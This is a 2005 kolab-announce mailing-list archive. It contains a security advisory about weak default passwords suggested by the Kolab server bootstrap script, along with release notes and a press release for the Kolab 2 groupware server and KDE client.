From bh at intevation.de Thu Feb 10 13:57:35 2005 From: bh at intevation.de (Bernhard Herzog) Date: Thu, 10 Feb 2005 13:57:35 +0100 Subject: [Kolab-announce] Security Advisory 01 for Kolab Server Message-ID: <20050210125735.GA2729@intevation.de> A security problem affecting Kolab 1 and 2 servers has been discovered. Installations where the manager password suggested by the boostrap script was accepted unchanged and some development installations are vulnerable. Fixes are available. See the security advisory below for more details. Bernhard Herzog -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Kolab Security Issue 01 20050209 ================================ Package: kolab Vulnerability: privilege escalation Kolab Specific: yes Dependent Packages: none Summary - ------- The kolab_bootstrap script for the Kolab Server suggested passwords vulnerable to either a dictionary or brute force attacks for the administrative account "manager" and some other internal Kolab users (namely "nobody" and "calendar"). Each of the passwords was chosen from a set of only 4096 possibilities. Possible Effects - ---------------- (A) Only when the suggested manager password was accepted unchanged a remote attacker could get full write access to the Kolab LDAP tree by using either brute force or dictionary attacks. Write access to the Kolab LDAP tree factually means full control of the Kolab server. (B) As the nobody user has no further permissions and is internally only used as an alternative to anonymous binding, this will not leak sensible information when the password is successfully tested. (C) Kolab users giving the Kolab calendar user write permissions on their folders are vulnerable to having their calendar folders accessible by an attacker. The calendar user was introduced 20041014 in the Kolab 2 development branch and is not used in any of the Kolab 1 servers. Servers that have problem (A) and (B): Kolab 1 Server: before 20041213 (version 1.0.25 is safe) OpenPKG (independent of with_genuine setting) CURRENT kolab-20040503-20041207 RELEASE 2.2 kolab-20040503-2.2.0 RELEASE 2.1 kolab-20040503-2.1.0 Kolab 1 Server Mandrake: versions up to 1.0-0.61mdk Kolab 2 Server: before 20041122 (development branch) Servers that have problem (C): Kolab2 Server: after 20041014 but before 20041123 (development branch) Fixes - ----- The problems with the bootstrapping script (kolab_bootstrap) have been silently fixed in the Kolab 2 development branch since 20041201 and with an Update of Kolab 1 since 20041213. Released packages that contain the fixes: Kolab 1: http://max.kde.org:8080/mirrors/www.erfrakon.de/projects/kolab/download/kolab-server-1.0/src/kolab-1.0-1.0.25.src.rpm OpenPKG (independent of with_genuine setting) CURRENT kolab-20040503-20041214 RELEASE 2.2 kolab-20040503-2.2.1 RELEASE 2.1 kolab-20040503-2.1.1 Mandrake: versions from 0.62mdk on are corrected Kolab 2: Oldest Kolab 2 package with a fix (the beta releases are newer than this): ftp.kolab.org/kolab/server/development/20041201-full/sources/kolabd-1.9.3-20041201.src.rpm How to fix existing installations: 1.) Stop the Kolab server using /kolab/etc/rc.d/rc.kolab stop (Kolab 1 method) or /kolab/etc/rc all stop (Kolab 2 method) (a) New installations of the Kolab 1 server (>= 1.0.25) are not vulnerable to Problem (A) as fixes got incorporated into the current (20041213) package. Please note that the Kolab 2 development is already in late Beta stage. We therefore strongly recommend to go with Kolab 2 for new installations or major renovations. (b) New installations of the Kolab 2 development branch (> 20041122) are not vulnerable to Problem (A) as fixes got incorporated into the current package. (c) Existing installations of Kolab 1 are vulnerable to Problem (A) if the suggested manager password was accepted instead of being manually chosen. This problem can be fixed without the need to upgrade the installation by choosing a more secure manager password manually. Please note that during an update of a Kolab installation the manager password is preserved so that every affected installation is asked to choose a more secure manager password manually. We are assisting this process by proving a kolabpasswd script for Kolab 1. (d) Existing installations of the Kolab 2 development branch are vulnerable to Problem (A) if the suggested manager password was accepted instead of being manually chosen. This problem can be fixed without the need to upgrade the installation by choosing a more secure manager password manually. We are assisting this process by proving a kolabpasswd script for Kolab 2. Due to the fact that Kolab 2 is in Beta we generally recommend to upgrade to the most recent package but during an update the manager password is preserved so that every affected installation is asked to choose a more secure manager password manually. (e) changing the nobody password on existing installations (Kolab 1 and Kolab 2) as a remedy for Flaw (B) using kolabpasswd nobody is optional. We recommend to use the proposed password of kolabpasswd as this password is only for internal use within the Kolab and never needs manual entering. (f) change the calendar password on existing installations vulnerable to Problem (C) using kolabpasswd calendar We recommend to use the proposed password of kolabpasswd as this password is only of internal use and never needs manual entering. 2.) Start the Kolab server using /kolab/etc/rc all start (Kolab 2 method) or /kolab/etc/rc.d/rc.kolab start (Kolab 1 method) Details of the security problem - ------------------------------- kolab_bootstrap used the following commands for suggesting passwords: @@@kolab_prefix@@@/bin/openssl passwd kolab @@@kolab_prefix@@@/bin/openssl passwd nobody @@@kolab_prefix@@@/bin/openssl passwd calendar This is a weak implementation of suggesting password and is subject to brute force and dictionary attacks. The new code looks like @@@kolab_prefix@@@/bin/openssl rand -base64 12 @@@kolab_prefix@@@/bin/openssl rand -base64 30 @@@kolab_prefix@@@/bin/openssl rand -base64 30 Timeline - -------- 20041201 Problem deteced by Bernhard Reiter and Bernhard Herzog from Intevation GmbH. Developers notified. 20041202 Analysis. First fix of the scripts in the Kolab CVS (Kolab 2) and manual recovery instructions. 20041203 Vendors notified 20041213 convenience scripts provided (kolabpasswd) by Martin Konold and Tassilo Erlewein from erfrakon 20041213 Kolab 1 update package available 20041214 Updated Kolab 1 OpenPKG packages available (Thomas Lotterer) 20050209 Kolab security advisory published -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (GNU/Linux) iD8DBQFCClPf0vCiU5+ISsgRAkFhAKD4X7DHhmBlKBMg0xjxWGtJ1pDQmwCfYVvF BxXGUo1bHuuuI5keKRDRQqw= =sPkd -----END PGP SIGNATURE----- From bernhard at intevation.de Thu Mar 10 15:39:09 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Thu, 10 Mar 2005 15:39:09 +0100 Subject: [Kolab-announce] Kolab-Server-2.0-beta-3 released, includes security fixes Message-ID: <200503101539.14142.bernhard@intevation.de> ? Kolab 2 Server beta 3 released. The third beta of the Kolab 2 server implementation is out on the mirrors. It fixes security issues and a few bugs. Details can be found in the release notes. http://www.kolab.org/ You can see Kolab 2 at CeBIT Hall 6 in the KDE booth within LinuxPark. -------------- next part -------------- Release notes Kolab2 Server 20050309 (Version 20050309, Kolab server 2.0 beta 3) For upgrading and installation instructions, please refer to the README.1st file in the source directory. Changes since Beta 2, 20050114: - updated to openpkg version 2.2.2 - updated imapd, zlib and clamav packages. These updates fix security issues. - kolabd 20050114 -> 20050221 kolab_bootstrap stops when ldap cannot be accessed instead of carrying on and merely warning about it main.cf.template now sets message_size_limit to 20 MiB * Fixing: Issue626 (/kolab/etc/rc all start starts proftpd) Issue615 (smtppolicy sometimes fails because ldap lookup fails) Issue649 (logrotation for all logs) - kolab-resource-handlers 20050114 -> 20050221 * Fixing: Issue610 (html mails get corrupted) Issue641 (extra slash in pfb trigger url) Issue638 (cannot trigger other account's pfb creation) Issue651 (fix install warnings) - kolab-webadmin 20050114 -> 20050222 Shows visibility of distribution lists in the distribution list overview * Fixing: Issue635 (Cannot send mail to UPPER CASE shared folder) Issue646 (global shared folder with non-ascii characters) Issue672 (virusalert at domain.tld and MAILER-DAEMON at domain.tld added) - perl-kolab 20050110 -> 20050221 * Fixing: Issue621 (comment char # in kolab.conf) Issue656 (public folders: No annotations and cannot create) -------------- next part -------------- Upgrade from Beta2 ------------------ The compile time options of apache and php have changed a little to enable multibyte strings. Unfortunately, obmtool will not automatically recompile the packages for you. To make sure the packages are recompiled, you need to uninstall the packages and remove the binary RPMs from /kolab/RPM/PKG: /kolab/bin/openpkg rpm -e --nodeps apache php rm /kolab/RPM/PKG/apache-* rm /kolab/RPM/PKG/php-4* -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050310/4b259ae0/smime.bin From bernhard at intevation.de Sat Mar 26 19:06:56 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Sat, 26 Mar 2005 19:06:56 +0100 Subject: [Kolab-announce] Kolab-Server-2.0-beta-4 released Message-ID: <200503261907.01366.bernhard@intevation.de> ? Kolab 2 Server beta 4 available The forth beta of the Kolab 2 Server now also offers a German admin interface. The team welcomes additional translations. Some minor improvements were made and, as always: The mirrors are your friends. Thanks to Belnet at this point for providing another mirror for Kolab. -------------- next part -------------- Release notes Kolab2 Server (Version 20050324, Kolab server 2.0 beta 4) For upgrading and installation instructions, please refer to the README.1st file in the source directory. Changes since Beta 3, 20050309: updated obmtool. It's now rev. 1.42 from OpenPKG. - kolabd 20050221 -> 20050318 Add support for EQUALITY and SUBSTRING to kolab2.schema Better indexing for OpenLDAP: added pres to ldap db indices. See README.1st for how this affects an upgrade. - kolab-resource-handlers 20050221 -> 20050318 kolab_smtpdpolicy grew an option to check Sender: it if exists instead of From:. This is turned off by default as it allows to send emails "on behalf of" without being email-delegate. * Fixing: Issue648 (resmgr generates empty PFBs for normal users) - kolab-webadmin 20050222 -> 20050318 The web interface is internationalized now. Languages currently supported are English and German. Attribute access by normal users is now configurable. Attributes can be made e.g. read-only, mandatory or invisible. Some more vacation settings: - whether to react to spam - restrict vacation messages to a specific domain Updated some texts, email addresses and URLs. * Fixing: Issue672 (added virusalert at domain.tld and MAILER-DAEMON at domain.tld) Issue646 (non-ascii chars in names of global folders) - perl-kolab 20050221 -> 20050318 * Fixing: Issue656 (re-added a right to shared folder all access) Issue687 (deletion logic) -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050326/30ed6e5a/smime.bin From bernhard at intevation.de Mon Apr 25 18:03:56 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Mon, 25 Apr 2005 18:03:56 +0200 Subject: [Kolab-announce] Kolab-Server-2.0-beta-4 published Message-ID: <200504251803.58050.bernhard@intevation.de> ? Kolab 2 Server beta 5 published. The fiths beta of Kolab 2 Server comes with minor fixes and improvements. -------------- next part -------------- Release notes Kolab2 Server (Version 20050422, Kolab server 2.0 beta 5) For upgrading and installation instructions, please refer to the README.1st file in the source directory. Changes since Beta 4, 20050324: - updated openpkg packages: openldap-2.2.23-2.3.0 pth-2.0.4-2.3.0 - kolabd 20050318 -> 20050421 amavisd configuration: A kolab user sending Spam/Virus mails gets a bounce notification. Mail sent from outside to a kolab user will, as before, still be held in quarantine and the recipient will get a notification. Added support for using a non-kolab ldap server instead of kolab's own server as master. This includes: - kolabd can listen to connections from other slurpds - deletion of ldap objects can be adapted to such setups (issue721). Added some documentation about the amavisd, web-admin and ldap-deletion configuration options in kolab. Some more ldap indices were added. * Fixing: Issue647 (Message "perl: No worthy mechs found" fills up logs) Issue681 (nobody/calendar password for slave) Issue708 (session storage) Issue706 (kolabpassword for calendar and nobody broken) - kolab-resource-handlers 20050318 -> 20050412 Better handling of mails with multiple recipients Main part of a fix for Issue665 (outlook appointment forwarding not possible with email spoof protection) - kolab-webadmin 20050318 -> 20050422 It is now configurable which account types can log in to the web-admin interface. E.g. login can be limited to normal users if administration is not to be done with the admin interface. Some more options for vacation notifications: - whether to send notifications for messages classified as spam or virus - limit notifications to certain domains. * Fixing: Issue660 (primary email addresses with incorrect maildomain) - perl-kolab 20050318 -> 20050421 * Fixing: Issue647 (Message "perl: No worthy mechs found" fills up logs) Issue698 (LDAP Sync can cause mailbox deletion) - imapd imapd-2.2.12-2.3.0_kolab > 2.2.12-2.3.0_kolab2 * Fixing: Issue571 (allow more characters in mailbox names) $Id: release-notes.txt,v 1.5 2005/04/22 17:14:59 bernhard Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050425/cc9a6160/smime.bin From bernhard at intevation.de Wed May 4 13:23:12 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Wed, 4 May 2005 13:23:12 +0200 Subject: [Kolab-announce] Kolab2 Clients out of beta, KDE Client release candidate 1 available Message-ID: <200505041323.17511.bernhard@intevation.de> The KDE Kolab2 client has been published as "release candidate 1" tarball based on KDE 3.3. A logical consequence of good experiences with this software during the last months. Get it from the download servers along with the release notes (also attached for convenience) The release comes so late, because: KDE packagers tend to build from stable CVS branches and often do not rely on tarballs anyway. On a related note: Toltec 2.0 release candidate 2 is also available. -------------- next part -------------- Release notes for the Kolab KDE Client RC 1 =========================================== 2005-05-03, Bernhard Herzog Note: Many entries here contain references to entries in the kolab issue tracker, https://intevation.de/roundup/kolab/. You can easily look them up by appending the reference to that URL, e.g. the URL for issue510 is https://intevation.de/roundup/kolab/issue510 . Some issues are specific to the aegypten project (S/MIME for kmail) and can be looked up under https://intevation.de/roundup/aegypten/ Upgrading from older (pre beta 1) kontact based clients ------------------------------------------------------- If you have configured your kdepim installation with an older version of the kolabwizard (or have done it manually) you may need to tweak the URL Korganizer uses to fetch free/busy lists from the kolab2 server. The url for fetching free/busy lists should be https://kolabserver/freebusy/%25EMAIL%25.ifb Changes since Beta1 (2005-02-03) -------------------------------- KMail ----- - Fixed deletion of folders with subfolders (kolab issue678) - Remove choice between Kolab-XML and ical/vcard as storage format, it's always kolab-xml in proko2. - Fixed vanishing special icons when renaming/moving a special folder. - Tell the resources when renaming a groupware folder (kolab issue639) - Fixed header-list suddenly empty in rare cases. - If there is no valid email address in the From header, but a name, display it. - Don't let the "No HTML Message" label force a minimum height on the reader widget. - Fixed utf8 in freebusy-trigger URLs (kolab issue640) - Fixed inline forwarding of opaque signed and encrypted mails with attachments (part of issues 39/266) - Don't attempt to sync up changed acls if the user has insufficient rights to do so. - Fixed aegypten issue 295: "kmail encrypts entire mail though only attachment was to be encrypted" - Aegypten proxy: kleopatra<->kmail communication (aegypten issue296) - Aegypten proxy: disable proxy settings when "Ignore HTTP CRL DPs of certificate" is unchecked. - Aegypten proxy: use honor-http-proxy option - Fixed migration issue for users with an old kpgprc, broke decrypting mails. - Vacation GUI extended, to restrict sending of vacation replies for known spam and to addresses outside of the company. - "Copy folder to" feature. - Fix message-status-handling broken by previous cached imap speedup - Fix for syncing a new client with an already existing imap account (used to wrongly disable kolab resource) - Fix for inline forwarding of inline invitation mails (content-type text/calendar), - and another fix for "inline forwarding a mail consisting of only a top level body part". - Fix the fix for completion order when an item would be listed multiple times. - Fix temporary filename used for compacting a folder, to ensure no ghost folder appears on kmail restart - Escape folder names when displaying them in error dialogs (kolab issue725) Kolab XML Resource ------------------ - Fixed off-by-one in month names (kolab issue688) - Yearly recurrence fix - Fixed mapping of phone types to preserve "business2" and "company" from outlook. Kolab Wizard ------------ - Remove kolab1 vs kolab2 choice, since kolab1 isn't available in proko2 branch. KPilot ------ - Updated to KDE_3_4_BRANCH's version, with some fixes so that it works with kdelibs-3.2. Kleopatra --------- - added Chiasmus support - Redesigned automatic config dialog Aegypten Backend ---------------- - added chiasmus support Other ----- - Fixed rare crash in kio_imap4 - Updated translations. Known Bugs ---------- - When copying folders conflict resolution dialog boxes come up for the copied events (kolab issue727) - kpilot warns about being used with kdelibs 3.2.x even though it has been backported to work in that environment. Already fixed in CVS. - kpilot doesn't work properly yet with kolab resources. (kolab issue704) -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050504/80881b26/smime.bin From bernhard at intevation.de Mon May 9 19:50:48 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Mon, 9 May 2005 19:50:48 +0200 Subject: [Kolab-announce] Kolab Server 2.0-rc1 published. Message-ID: <200505091950.52543.bernhard@intevation.de> The first release candidate for Kolab 2 Server is public. Like the couple of last betas there are only a few minor fixes and improvements in this release. Attached the release notes. -------------- next part -------------- Release notes Kolab2 Server (Version 20050506, Kolab server 2.0 RC 1) For upgrading and installation instructions, please refer to the 1st.README file in the source directory. Changes since Beta 5, 20050422: - kolabd 20050421 -> 20050503 Run more than one instance of the kolabfilter to improve mail performance Add DB_CONFIG for openldap's database. Part of Issue707. Some more documentation: - how Kolab uses sieve - solution for invitations forwarded by Outlook * Fixing: Issue591 (show Kolab version) - kolab-resource-handlers 20050412 -> 20050504 some performance improvements * Fixing: Issue231 (german text in fbview) Issue665 (problems with appointments forwarded by outlook) - kolab-webadmin 20050422 -> 20050428 * Fixing: Issue533 (add mail attribute to distribution lists) Issue607 (do not remove users if they're single members of dlists) Issue591 (Kolab version in "About Kolab" page) - perl-kolab 20050421 -> 20050503 Add DB_CONFIG for openldap's database. Part of Issue707. * Fixing: Issue222 (no more "c" permissions for public folders) $Id: release-notes.txt,v 1.7 2005/05/06 10:45:11 bh Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050509/f2a0d330/smime.bin From bernhard at intevation.de Tue May 31 20:27:20 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Tue, 31 May 2005 20:27:20 +0200 Subject: [Kolab-announce] Server 2.0-rc2 released/ advisory for rc1 and rc2 Message-ID: <200505312027.25041.bernhard@intevation.de> Kolab-Server-2.0-rc2 is ready on the mirrors, but rc3 will follow shortly as we found a critical bug after releasing rc2. Still rc2 is interesting for some people. Carefully check the attached release-notes. Best, Bernhard -------------- next part -------------- Release notes Kolab2 Server (Version 20050527, Kolab server 2.0 RC 2) For upgrading and installation instructions, please refer to the 1st.README file in the source directory. WARNING With Kolab-Servers 2.0-rc1 and 2.0rc2 there is a chance to lose emails which came in with a null sender (aka MAIL FROM:<>), if you enabled the check to prevent users to forge from: headers. The fix will be in upcoming rc3; technical details are in issue774. As workaround, disable the "envelope header from" check in /kolab/etc/kolab/templates/resmgr.conf.template set $params['verify_from_header'] = false and run kolabconf. Changes since RC 1, 20050506: - postfix 2.1.5-2.2.0_kolab -> 2.1.5-2.2.0_kolab2 * Fixing: Issue746 (distributionlist duplicates emails) - openldap 2.2.23-2.3.0 -> 2.2.23-2.3.0_kolab Make sure libdb is linked statically. Some more configuration tweaks. There's a new index on givenName among other things Build with native threads instead of using pth. This may help fix Issue707 (occasional slapd hangs after attempted writes) - imapd 2.2.12-2.3.0_kolab2 -> 2.2.12-2.3.0_kolab3 Make sure libdb is linked statically. - kolabd 20050503 -> 20050526 Localized virus/spam delivery status notifications. Only German so far. It's not enabled by default. * Fixing: Issue746 (distributionlist duplicates emails) - kolab-resource-handlers 20050504 -> 20050520 better error handling in filter scripts * Fixing: Issue744 (invitation policy not case independent) - kolab-webadmin 20050428 -> 20050527 localized vacation message text "no vacation replies to spam" is now default * Fixing: Issue745 (inconsistant groupOfNames when changing an account's DN) $Id: release-notes.txt,v 1.10 2005/05/31 18:25:52 bernhard Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050531/8815e7e3/smime.bin From bernhard at intevation.de Mon Jun 6 12:53:13 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Mon, 6 Jun 2005 12:53:13 +0200 Subject: [Kolab-announce] Kolab Message-ID: <200506061253.17196.bernhard@intevation.de> Kolab 2 Server RC 3 released The third release candidate of the Kolab2 Server implementation fixes a few important bugs. Especially we have hopes that OpenLDAP behaves more stable on GNU/Linux systems now. Attached the lastest revision of the release notes. Best, Bernhard -------------- next part -------------- Release notes Kolab2 Server (Version 20050603, Kolab server 2.0 RC 3) For upgrading and installation instructions, please refer to the 1st.README file in the source directory. Changes since RC 2, 20050527: - The pth package has been removed - clamav 0.83-2.3.0 -> 0.85.1-20050517 * new upstream version, security relevant because better detection. - openldap-2.2.23-2.3.0_kolab -> openldap-2.2.23-2.3.0_kolab2 * Some more fixes to make sure that it won't use pth. The changes in rc2 weren't enough. We hope to fix Issue707 (occasional slapd hangs after attempted writes) but this might break support for Solaris platforms in favour of GNU/Linux. * Some more performance tweaks. * Run db_recover when starting openldap - postfix 2.1.5-2.2.0_kolab2 -> postfix-2.1.5-2.2.0_kolab3 * Fixing: Issue774 (null senders would cause email loss) - kolabd 20050526 -> 20050601 * Fixing: Issue764 (unauthenticated free/busy not allowed with legacy mode) Issue777 (kolabconf error: cannot open legacy.conf.template) Issue768 (added postfix virtual map template) Issue774 (null senders would cause email loss) - perl-kolab 20050503 -> 20050530 * Fixing: Issue764 (unauthenticated free/busy not allowed with legacy mode) Issue768 (added postfix virtual map template) - kolab-webadmin 20050527 -> 20050530 support multi-valued mynetworks * Fixing Issue769 (can create collision with external addressbook) Issue730 (Cannot rename user in Kolab2 Admin interface) $Id: release-notes.txt,v 1.13 2005/06/06 10:43:07 bernhard Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050606/518eadb9/smime.bin From bernhard at intevation.de Wed Jun 15 17:32:51 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Wed, 15 Jun 2005 17:32:51 +0200 Subject: [Kolab-announce] KDE client close to release Message-ID: <200506151732.55977.bernhard@intevation.de> The third release candidate of the KDE Kolab2 Client based on KDE 3.3 is public. After a short final testing period it will be declared stable. As always, you can get the tarball from the mirrors. The release notes are attached for your convenience. Note that RC2 was not widely announced, because we found a critical bug that prompted an RC3 release. Regards, Bernhard -------------- next part -------------- Release notes for the Kolab KDE Client RC 3 =========================================== 2005-06-10, Bernhard Herzog Changes since RC 2 (2005-05-08) ------------------------------- certmanager ------ * Key selection dialog: Work around bug in Qt where disabling and reenabling the widget that has focus does not properly make it refocus. This solves the problem that you had to click in the search line (even while the cursor wash flashing there) to make it editable. kmail ------ * Show resource icons also for folders with unread mail. * Only reset the content type to text/plain if it is a multipart currently, otherwise invitation replies get the wrong mime type :/ (kolab issue790) * Make it possible to configure alphabetical instead of weighted sorting of the completion entries via a checkbox in the completion editor dialog. Make sure changes there are picked up by the currently active addressee lineedits. (kolab issue734) * Update version number to rc3 kontact ------ * Update version number to rc3 korganizer ------ * Import new event template management dialog from trunk, so that templates can be deleted (kolab issue763) * Make sure the freebusy retrieval state is reset, when retrieval is not possible (kolab issue787) kresources ------ * Drop completed dates if the task is not completed on writing or reading. Changes since RC 1 (2005-05-03) ------------------------------- KOrganizer ---------- * Fix failure to enable "Reminder for first recurrence only" checkbox KMail ----- * Fix for conflict resolution dialogs when copying resource folders * Chiasmus: Make canceling pinentry cancel the operation * Fix for conflicting signing or encryption preferences * Chiasmus: Implemented body encryption * Chiasmus: Implemented body decryption * Chiasmus: Fix content-type and chiasmus-charset in both cases (with and without attachments) * Chiasmus: Fix wrong content-transfer-encoding in chiasmus-encrypted mails * Add "Troubleshoot IMAP Cache..." to Folder menu (since it's already in the RMB) * Fix for showing the IMAP-related menu item only if there is an IMAP account * Fix to no longer show an error dialog when the IMAP server closes the connection * Add an additional entry to the settings menu of the composer which allows access to the address completion weight configuration * Fix for replying to or forwarding messages after they were opened in a separate reader window * Create the default folders in the local language * Fix for inline-forwarding or draft-editing mails with a signature * Fix to force utf8 encoding on Kolab xml mail parts * Use a different mimetype (application/x-vnd.kolab.contact.distlist) for distribution lists, as discussed on kolab-format * Fix for dropping local only or distribution list contents of the "to" field during IDN expansion * Remove the global "refresh cache" menu entry Kolab XML Resource ------------------ * fix for reading and writing the pilot sync id and status to emnable pilot syncing * Make the scheduling ID an implementation detail not visible to the outside. It was removed from the specification. * Drop completed dates if the task is not completed on writing or reading LDAP Search and Completion -------------------------- * Don't show structural entries, but only real persons, or everything that has an email address Kontact ------- * start the calendar part when accepting an invitation and it is not running yet Updated Translations -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050615/95aa63bf/smime.bin From bernhard at intevation.de Fri Jun 17 20:47:31 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Fri, 17 Jun 2005 20:47:31 +0200 Subject: [Kolab-announce] Kolab Server 2.0 RC 4 published; security and bug fixes Message-ID: <200506172047.36556.bernhard@intevation.de> While the mirrors are catching up.... Kolab Server 2.0 RC 4 published; security and bug fixes The latest and probably last release candidate for the Kolab Server 2 comes with two important bugfixes and draws a few security updates from OpenPKG. After a brief testing period it will become the stable release. Attached for your convenience: the release-notes. Bernhard -------------- next part -------------- Release notes Kolab2 Server (Version 20050617, Kolab server 2.0 RC 4) For upgrading and installation instructions, please refer to the 1st.README file in the source directory. Changes since RC 3, 20050603: - Some openpkg security updates: openpkg 2.2.2-2.2.2 -> 2.2.3-2.2.3 perl 5.8.5-2.2.1 -> 5.8.5-2.2.2 bzip2 1.0.2-2.2.0 -> 1.0.2-2.2.1 gzip 1.3.5-2.2.0 -> 1.3.5-2.2.1 - imap-2004a-2.2.0 -> imap-2004c-2.3.0_kolab - apache-1.3.31-2.2.3_kolab -> apache-1.3.31-2.2.3_kolab2 - php-4.3.9-2.2.2 -> php-4.3.9-2.2.2_kolab * Kolab specific versions of the packages with a patch that adds support for annotations in cimap and its php bindings. Unused so far. - imapd-2.2.12-2.3.0_kolab3 -> imapd-2.2.12-2.3.0_kolab4 * Fixing: Issue784 (managesieve undef symbol) - kolabd 20050601 -> 20050615 * Moved kolabfilter settings verify_from and allow_sender to LDAP and some other changes related to the fix for Issue783 * Fixing: Issue779 (german quota warning) - kolab-webadmin 20050530 -> 20050616 * Make verify_from and allow_sender accessible from webgui. This is part of the fix for Issue783 * Added french translations. Doesn't work properly yet, though. * Fixes: Issue722 (webgui language switching) Issue804 (addressbook collision with distribution-list) Issue797 (better confirmation dialog for deleting distribution list) - kolab-resource-handlers 20050520 -> 20050615 * disable SID creation * Increase the maximal execution time for php scripts * Substantial improvement of the performance of the partial free/busy generation (this is part of the fix for Issue793) * Fixing: Issue778 (mail alias for free/busy retrieval) Issue783 (envelope header from check has problems with mailinglists) Issue793 (php aborts on long pfb creations) $Id: release-notes.txt,v 1.15 2005/06/17 15:03:40 bh Exp $ -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2145 bytes Desc: signature Url : http://kolab.org/pipermail/kolab-announce/attachments/20050617/51eb74da/smime.bin From bernhard at intevation.de Tue Jun 21 00:36:18 2005 From: bernhard at intevation.de (Bernhard Reiter) Date: Tue, 21 Jun 2005 00:36:18 +0200 Subject: [Kolab-announce] Kolab 2.0 Groupware released! Message-ID: <200506210036.23064.bernhard@intevation.de> Almost two years after the stable release of Kolab 1, the Kolab team is proud to present the stable releases of Kolab Server 2.0 and KDE Kolab Client 2.0! Attached the text version of the press release from http://www.kolab.org/news/pr-20050620.html and the release notes for server and client for your convenience. Thanks to all supporters, testers and helpers. Spread the word, Bernhard -------------- next part -------------- DATELINE June 20th, 2005 FOR IMMEDIATE RELEASE Kolab 2 Groupware released The Kolab Groupware Project (http://www.kolab.org) today announced the immediate availability of Kolab 2, a reliable and extremely scalable groupware solution for GNU/Linux that can replace Microsoft Exchange. Beside emails, the solution empowers users to manage and share their appointments, contacts and tasks. without the necessity of being constantly online. "With our focus on native offline-capable clients, Kolab 1 had brought a new approach to the groupware world," explains Bernhard Reiter, CEO of Intevation GmbH and project coordinator. "With this second generation, users can now share their groupware folders even with users that use Outlook when they are using KDE and vice versa." Additional new features are support for servers at several locations, usability, speed improvements, support for spam-control and anti virus software. The new stable release 2.0 has been about two years in coming as 1.0 has been released in mid 2003. Beta versions of Kolab 2.0 have undergone intensive testing in the last 6 months. "Kolab owes its scalability to its concept", explains Martin Konold senior partner at erfrakon, who designed the Kolab architecture, "all groupware data is stored on the IMAP server in MIME structures instead of using a traditional database. Thanks to the smart client concept, most CPU-intensive operations are performed on the client. Cyrus, the chosen IMAP server software, also allows for an on-the-fly backup of the IMAP store." The Kolab-Konsortium will present the Kolab Solution at LinuxTag in Karlsruhe (Booth B81, Intevation GmbH) this week. Additionally, Bernhard Reiter will give a presentation on thursday, 13:00-14:00h. Kolab has an active and growing community that can be reached via several active mailinglists as well as the Kolab Wiki at http://wiki.kolab.org. Enterprise-level support is available from the Kolab Konsortium. All daily administration tasks can be performed via a web interface. The OpenPKG environment makes the server easy to deploy on all kinds of GNU/Linux distributions and Unix derivates. Just like its predecessor, Kolab 2 is based on well-proven Free Software server components, such as Apache, Postfix, Cyrus imapd and OpenLDAP. Windows users can keep their Outlook installation: The Toltec Connector 2.0 turns Outlook into a fully-fledged Kolab 2 client at low cost. Additionally, a special convenience package of Kontact, the KDE Groupware client, has been made available. It has undergone special testing by the Kolab-Konsortium and can be used with KDE 3.2 and higher. Users that cannot upgrade to KDE 3.4.1 should use this package for client deployment. Kontact is a feature-complete Kolab 2 client. "A unique property of the Kolab Project is that it uses existing proven components and works very closely with the associated Free Software communities." says Kalle Dalheimer, CEO of Klarälvdalens Datakonsult AB, the company that did the actual software implementation. "For example, our KDE Kolab client benefits from the full S/MIME capabilities for email signatures and encryption done by a different project." In addition to the native clients a Kolab-compliant web interface based on the Horde Framework is in beta stage and will become available later in 2005. About the Kolab Konsortium The Kolab Konsortium was founded by Intevation GmbH, Klarälvdalens Datakonsult AB and erfrakon Partnerschaftsgesellschaft, the creators of Kolab. The Konsortium offers courses, consultancy, development and enterprise-level support for the Kolab server and clients. It works together with Radley Network Technologies CC (open file-format for the Toltec Connector) and Code Fusion CC. Read more about the Kolab Konsortium at http://www.kolab-konsortium.de Press Contact: Bernhard Reiter Kolab-Konsortium Georgstraße 4 49074 Osnabrück Germany Phone: +49-541-3350830 Fax: +49-541-3350859 Email: info at kolab-konsortium.de About KDE KDE is a powerful Free Software graphical desktop environment for GNU/Linux and Unix workstations. It combines ease of use, modern functionality, and outstanding graphical design with the technological superiority of the Unix operating system. Read more about KDE at http://www.kde.org. Press Contact: Matthias Kalle Dalheimer Rysktorp S-683 92 Hagfors Sweden Phone: +46-563-540023 Fax: +46-563-540028 Email: info at kde.org -------------- next part -------------- Release notes Kolab2 